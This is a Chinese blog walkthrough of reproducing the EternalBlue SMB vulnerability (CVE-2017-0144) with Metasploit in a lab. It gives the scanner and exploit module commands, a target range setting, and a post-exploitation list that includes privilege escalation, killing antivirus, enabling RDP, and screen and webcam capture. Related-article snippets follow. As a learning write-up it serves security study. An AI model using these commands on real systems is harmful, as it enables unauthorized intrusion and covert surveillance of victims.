漏洞复现_CVE-2017-0144 “永恒之蓝”漏洞

最新推荐文章于 2025-06-16 00:01:59 发布
最新推荐文章于 2025-06-16 00:01:59 发布
阅读量3.5k 收藏 9
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51550750/article/details/125105315
本文详细介绍了Windows系统CVE-2017-0144(永恒之蓝)漏洞的环境配置、原理、利用方法,包括Metasploit工具的使用步骤,以及防范措施和后渗透操作。重点讲解了漏洞扫描、探测范围设定和实际攻击的执行过程,同时揭示了安全狗可能带来的问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01_环境准备

(1)一台Windows电脑

(可以使用虚拟机代替)

配置是 网络—>右键,属性---->高级共享设置---->启用文件和打印机共享
在这里插入图片描述
(可以理解为,这样设置才使其具有了“永恒之蓝”漏洞)

(2)Metasploit任意平台

可以是Windows版,可以是kali自带版
在这里插入图片描述

0x02_漏洞简介

1.何为CVE-2017-0144?

​ CVE-2017-0144 既 永恒之蓝最早爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了勒索病毒,使全世界大范围内遭受了勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。

2.什么是SMB协议?

SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

3.SMB工作原理是什么?

(1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。

(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。

(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。

(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。

0x03_原理

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

0x04_CVE-2017-0144 利用方法

【1】查询利用模块
终端里输入 search ms17_010
在这里插入图片描述

有两个利用模块,两个辅助模块

【2】使用探测模块

终端内输入 use auxiliary/scanner/smb/smb_ms17_010
在这里插入图片描述

【3】设置探测范围
options
在这里插入图片描述
可以看到要配置Rhosts

在这里插入图片描述

(设置扫描当前网段 可以通过 在终端内输入ip a 查看)

这里有两个填法
(1)输入C段,就像我上面的截图,但是会扫很久,因为毕竟要扫255个

(2)输入一段范围,比如我知道大概是172.16.13.9-20之间,就可以这么输入:172.16.13.9-172.16.13.20

【4】开始探测

终端内输入 run 执行探测

如果要探测255个,还是要很久的,2000years later…
在这里插入图片描述
最后扫到一台

【5】漏洞利用

首先在终端里输入
search ms17_010
在这里插入图片描述

使用 模块
use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述

【6】配置利用模块

配置模块
show options
配置靶机
这里IP填探测到的IP
在这里插入图片描述

【7】执行攻击

在终端里输入 run

但是这里给我报了个错:
在这里插入图片描述
RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError
[*] Exploit completed, but no session was created.

后来查了一下资料,估计应该是装了一个安全狗,导致无法成功利用。

0x05_后渗透操作

查看进程:ps
查看当前进程号:getpid
查看系统信息:sysinfo
查看目标机是否为虚拟机:run post/windows/gather/checkvm
查看完整网络设置:route
查看当前权限:getuid
自动提权:getsystem
关闭杀毒软件:run post/windows/manage/killav
启动远程桌面协议:run post/windows/manage/enable_rdp
列举当前登录的用户:run post/windows/gather/enum_logged_on_users
查看当前应用程序:run post/windows/gather/enum_applications
抓取目标机的屏幕截图:load espia ; screengrab
抓取摄像头的照片:webcam_snap
查看当前处于目标机的那个目录:pwd
查看当前目录:getlwd

Windows - SMB 远程代码执行漏洞永恒之蓝- CVE-2017-0146 & MS17-010
Blue17 の 小窝
03-22 1343
永恒之蓝漏洞(MS 17-010、
漏洞复现永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
李火火的安全圈
03-07 9192
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
win7永恒之蓝微软官方补丁
05-16
没打补丁的赶紧打,网上的关闭端口方法我都试了,关不掉
CVE-2017-0144 EternalBlue(永恒之蓝漏洞分析
子曰小玖的博客
04-08 7641
前言 EternalBlue(永恒之蓝)据称是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的模块,由于其涉及漏洞的影响广泛性及利用稳定性,在被公开以后为破坏性巨大的勒索蠕虫 WannaCry所用而名噪一时。360威胁情报中心对于WannaCry的活动持续地进行着监控,我们看到的趋势是 WannaCry的感染量还在增加,说明作为蠕虫主要传播手段的EternalBlue相应的漏洞还大量存在...
漏洞复现CVE-2015-1635、CVE-2017-0144
2301_77091612的博客
06-16 808
漏洞分析】CVE-2015-1635(HTTP.sys)和CVE-2017-0144永恒之蓝)是影响Windows系统的两个高危漏洞。HTTP.sys漏洞可通过特制HTTP请求导致系统崩溃或RCE,影响Win2008R2等系统;MS17-010则通过SMBv1协议实现远程代码执行。实验环境搭建未打补丁的Win2008R2+IIS服务,使用Kali进行渗透测试,成功验证漏洞存在性并通过Metasploit获取系统权限,最终利用PCShare木马实现持久化控制。关键步骤包括漏洞验证、内存读取、DoS攻击、s
CVE-2017-0144 (Windows server 2008系列缓冲区溢出漏洞
Fly_鹏程万里
03-15 8777
漏洞原理srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝。我们首先看下漏洞的触发点:unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2) {   int v4; // edi@1   _BYTE *v5; // edi@1   unsigned int result; // eax@1   v4 = a...
win7永恒之蓝
m0_58596609的博客
11-15 2327
一 使用msfconsole命令开启MSF,并使用search命令搜索永恒之蓝模块 search ms17-010 二 :使用搜索出来的第三个模块来进行探测目标是否存在永恒之蓝漏洞,并设置好以下参数进行扫描测试 >>>use auxiliary/scanner/smb/smb_ms17_010 /模块调用或者使用use 3对搜索出来的模块进行调用. >>>set rhost 192.168.202.131 //设置目标地址 >>&gt...
CVE-2017-0144永恒之蓝漏洞复现
cxm4545的博客
08-08 806
CVE-2017-0144永恒之蓝,最早爆发于2017年4月14日晚,它是在Windows系统的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上获取了最高权限,可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
三、漏洞编号为CVE-2017-7494的复现永恒之蓝)(Linux)(Ubuntu16.04.4)
qwsn
10-15 4342
一、漏洞分析 1.漏洞别名: CVE-2017-7494称为Linux版的永恒之蓝 2.漏洞用来做什么: 该漏洞用来,远程反弹shell并提权 3.漏洞适合的环境: Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。 //也就是Samba 3.5.0之后的所有版本,在4.6.4/4.5.10/4.4.14修复了这个漏洞。 二、漏洞环境复现 1.相关信息: ①IP地址...
CVE-2017-7494漏洞的分析与复现(Linux永恒之蓝
dgjkkhcf的博客
07-20 5297
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017-7494,漏洞影响了Samba3.5.0之后到4.6.4/4.5.10/4.4.14中间的所有版本。360网络安全中心和360信息安全部的GearTeam第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。...
[渗透测试笔记] 28.复现CVE-2017-0146(永恒之蓝)
H4ppyD0g的博客
02-06 3466
所有内容仅作为个人学习和实验使用,请勿用于非法用途,后果自负! 第一次复现漏洞,感觉好好玩 ???? 永恒之蓝编号CVE-2017-0146,可通过MS17-010补丁修补此漏洞 CVE可以看成一个漏洞字典,用来给广泛认同的信息安全漏洞等提供一个公共的名称。通过使用同一个名称,可以在各自独立的漏洞库中起到一定的兼容性效果,并帮助在各个漏洞库中找到相关修补信息。 MS17-010是微软的一个安全类型的补...
WannaCry勒索软件(CVE-2017-0144
HaSaKing的博客
05-28 734
2017年5月,WannaCry勒索软件爆发了一场全球性的网络安全危机,迅速感染了超过200,000台计算机,波及150多个国家。从医疗保健系统到政府机构,无数组织面临数据被加密和赎金要求的双重威胁。本文将提供关于WannaCry勒索软件的详尽分析,包括其工作原理、传播机制和防御策略,旨在提升公众对此类网络威胁的认识和应对能力。
msf复现利用永恒之蓝【MS17_010】CVE-2017-0144漏洞
qq_58873970的博客
07-28 888
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。漏洞复现是一个排错的过程,要善于利用互联网这个工具进行排难。
SMB MS17-010 利用(CVE-2017-0144
weixin_30408309的博客
08-10 997
exploit-db :https://www.exploit-db.com/exploits/42315/ 该漏洞的影响版本很广泛:Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) 具体请查看公告:Microsoft 安全公...
永恒之蓝漏洞CVE-2017-0144复现
LRainner的博客
03-04 4728
永恒之蓝漏洞CVE-2017-0144复现 环境搭建 一台kali攻击机 一台windows7靶机 信息收集 ifconfig 查看kali的ip地址为192.168.125.25 使用nmap扫描192.168.125.0网段下存活的主机 nmap 192.168.125.25/24 判断靶机ip地址为192.168.125.151 nmap -O 192.168.125.151 判断靶机为Windows 7|2008|8.1 使用永恒之蓝进行攻击 msfconsole进入metasploit控
Windows7的永恒之蓝(ms17_010)
2401_87269293的博客
12-19 334
windows版的metasploit也可以对永恒之蓝进行攻击,但是回弹meterpreter后容易出现获取不了shell的情况,建议在linux下使用。Windows7靶机IP:192.168.144.145。运行后回弹meterpreter就代表成功了。445端口open,说明存在永恒之蓝漏洞。注意选择使用exploit的永恒之蓝模块。
win7永恒之蓝复现(一)
qq_63831588的博客
06-12 1736
今天来记录一下我的第一个漏洞学习,win7永恒之蓝漏洞的心路历程,我会分享我学习的过程,以及我学习过程中遇到的问题,并且附上相应的解决方法,大家一起学习一起进步!我们来分析一下,首先由于永恒之蓝是基于445端口的,这里我们可以看到445是开放的(这是基本条件,如果没有开放我们要手动开放一下,不过445一般是默认开放的),其次我们可以看到下面扫到了ms17-010(永恒之蓝漏洞代号)这个漏洞,这就说明我们的win7中有这个漏洞,我们可以进行复现
Win7经典漏洞永恒之蓝复现
qq_42808240的博客
10-20 3111
win7经典漏洞永恒之蓝漏洞利用
Windows 7 靶机操作 永恒之蓝复刻
chidaoqiannianzq的博客
10-16 1070
kali WannaCry
进行永恒之蓝攻击怎么退出
最新发布
06-25
### 在进行 EternalBlue 攻击时如何安全退出或中止攻击流程 在使用 Metasploit Framework 进行 EternalBlue(MS17-010)漏洞利用时,如果需要中途停止或退出攻击流程,可以通过以下几种方式进行操作,确保不会对目标系统造成意外影响。 #### 1. 使用 `exit` 命令退出当前模块 在 Metasploit 的 `msfconsole` 环境中,若当前处于某个 exploit 模块(如 `exploit/windows/smb/ms17_010_eternalblue`),可以输入 `exit` 命令返回到主提示符界面。该操作会终止当前模块的配置和执行流程,防止进一步触发攻击行为[^2]。 示例: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > exit [*] Exploit completed, but no session was created. msf6 > ``` #### 2. 使用 `back` 命令切换模块而不执行攻击 如果尚未运行攻击命令(如 `exploit` 或 `run`),但已设置了目标 IP 地址或其他参数,可以通过输入 `back` 返回到主菜单,从而放弃当前模块的设置并避免误执行攻击流程[^2]。 示例: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > back msf6 > ``` #### 3. 终止正在进行的攻击任务 若攻击流程已经启动(例如通过 `exploit` 命令),并且攻击正在尝试连接目标系统,可以通过按下 `Ctrl+C` 中断当前执行的操作。此方法适用于防止攻击继续进行,尤其是在发现目标地址错误或未获得授权的情况下。 示例: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.1.5:4444 [*] Connecting to target for exploitation... ^C[-] Exploit interrupted by the user... msf6 exploit(windows/smb/ms17_010_eternalblue) > ``` #### 4. 清除模块设置以避免误执行 在退出前,若希望清除所有已设置的参数(如 RHOSTS、PAYLOAD 等),可使用 `unset all` 命令重置模块状态,确保下次使用时不会因残留配置导致非预期行为。 示例: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > unset all Unsetting all variables... ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值